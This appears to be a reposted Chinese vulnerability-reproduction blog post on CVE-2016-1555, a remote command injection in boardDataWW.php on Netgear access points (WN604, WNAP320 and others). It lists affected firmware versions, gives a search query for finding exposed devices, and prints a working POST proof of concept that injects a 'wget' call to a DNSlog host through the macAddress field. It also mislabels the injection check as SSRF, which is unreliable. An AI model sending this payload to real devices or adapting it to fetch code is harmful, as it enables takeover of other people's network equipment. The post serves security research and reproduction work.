文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责。如有侵权烦请告知,我会立即删除并致歉。谢谢!
一:漏洞描述
NetGear是一家知名的网络设备制造商,其路由器产品线多样化,性能稳定,易用性强,安全性高,并提供良好的技术支持和售后服务。适合家庭和企业用户使用,是可靠的网络设备品牌选择。
该产品boardDataWW.php处存在RCE漏洞,恶意攻击者可能会利用此漏洞执行恶意命令,最终导致服务器失陷。
二:漏洞影响版本
Netgear WN604 3.3.3之前的版本;WN802Tv2 3.5.5.0之前的版本;WNAP210v2 3.5.5.0之前的版本;WNAP320 3.5.5.0之前的版本;WNDAP350 3.5.5.0之前的版本;WNDAP360 3.5.5.0之前的版本;WNDAP660 3.5.5.0之前的版本。
三:网络空间测绘查询
title=="Netgear"
五:漏洞复现
POC:
POST /boardDataWW.php HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
macAddress=112233445566%3Bwget+http%3A%2F%2F[DNSlog]%23®info=0&writeData=Submit
SSRF漏洞复现通常使用DNSlog方式
服务器端请求伪造(Server-Side Request Forgery,SSRF)是一种安全漏洞,通常出现在允许用户提供URL并对其进行处理的地方,比如像图片上传、URL预览或其他外部资源加载的功能。攻击者可以利用这些功能,构造恶意的URL,使服务器发起对内部系统、本地文件或其他未授权的网络位置的请求。
使用DNSlog生成一个域名,替换POC中【DNSLog】内容
收到DNS解析记录
六:批量检测
避免将应用程序暴露给公共互联网
建议更新当前系统或软件至最新版,完成漏洞的修复。
原文始发于微信公众号(Adler学安全):漏洞复现-CVE-2016-1555
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论